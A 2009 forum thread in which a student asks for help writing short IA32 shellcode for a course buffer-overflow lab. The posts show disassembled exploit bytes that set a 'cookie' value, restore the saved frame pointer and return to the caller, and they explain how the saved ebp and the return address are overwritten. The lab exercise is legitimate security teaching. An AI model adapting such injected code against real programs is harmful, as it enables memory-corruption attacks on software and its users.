• Welcome to Valhalla Legends Archive.
 

[IA32 ASM] Buffer Overflow

Started by CrAzY, November 15, 2009, 04:25 PM

Previous topic - Next topic
Print
|
Go Down Pages1
User actions

CrAzY

November 15, 2009, 04:25 PM
Code Select
I need this to fit into 16 bytes.

]code]   0:   ff 35 d0 8c 04 08       pushl  0x8048cd0
   6:   c7 05 c0 a1 04 08 57    movl   $0x1a24a357,0x804a1c0
   d:   a3 24 1a
  10:   c3                      ret


Might need more help too.

Tim
CrAzY

brew

#1
November 15, 2009, 07:46 PM
Is that the exact assignment, to fit the equivalent of that code into one byte less?
I don't see smaller code happening.
<3 Zorm
Quote[01:08:05 AM] <@Zorm> haha, me get pussy? don't kid yourself quik
Scio te esse, sed quid sumne? :P

CrAzY

#2
November 15, 2009, 08:00 PM Last Edit: November 15, 2009, 08:07 PM by CrAzY
Its suppose to be a buffer overflow.  There are 12 available bytes in the buffer, then 4 more that can be used overwriting %ebp, and then the next 4 are used for the return address of the beginning of the buffer to run the exploit code.

Basically its suppose to just set a global variable at memory address "0x804a1c0" with my cookie which is  $0x1a24a357.  That cookie is static but it is also stored at "0x804a1b0" if there is any other way you could see that being used.

the assignment explicitly states that the code for this should be exactly 16 bytes.

Edit:  If there is any way I could speak more directly to you it would be much appreciated.  The assignment is due in 2 hours and there are only 4 parts to it and I'm currently finished with 2, and close to the other 2.  Thanks either way though.
CrAzY

CrAzY

#3
November 15, 2009, 09:02 PM
Update, I solved that one.  1 more to do.

"Your exploit code should set your cookie as the return value, restore any corrupted state, push the correct return location on the stack, and execute a ret instruction to really return to test."

Here's my guess?

Code Select
   0:   68 b0 b5 ff bf          push   $0xbfffb5b0  #ebp of previous stack
   5:   b8 57 a3 24 1a          mov    $0x1a24a357,%eax #move cookie to return
   a:   c9                      leave #i got away with not having this in my last problem.  Do I need it?
   b:   c3                      ret #hopefully return to the actual caller function :)


Any help would be nice =)
CrAzY

MyndFyre

#4
November 16, 2009, 01:45 AM
How did you solve the first problem?
QuoteEvery generation of humans believed it had all the answers it needed, except for a few mysteries they assumed would be solved at any moment. And they all believed their ancestors were simplistic and deluded. What are the odds that you are the first generation of humans who will understand reality?

After 3 years, it's on the horizon.  The new JinxBot, and BN#, the managed Battle.net Client library.

Quote from: chyea on January 16, 2009, 05:05 PM
You've just located global warming.

CrAzY

#5
November 16, 2009, 06:42 PM
Quote from: MyndFyre on November 16, 2009, 01:45 AM
How did you solve the first problem?

Instead of "pushl  0x8048cd0," I did "pushl  $0x8048cd0."

The result was 1 byte shorter..  And it made the code work how it was suppose to rather than pushing the value stored in that memory address.
CrAzY
Print
|
Go Up Pages1
User actions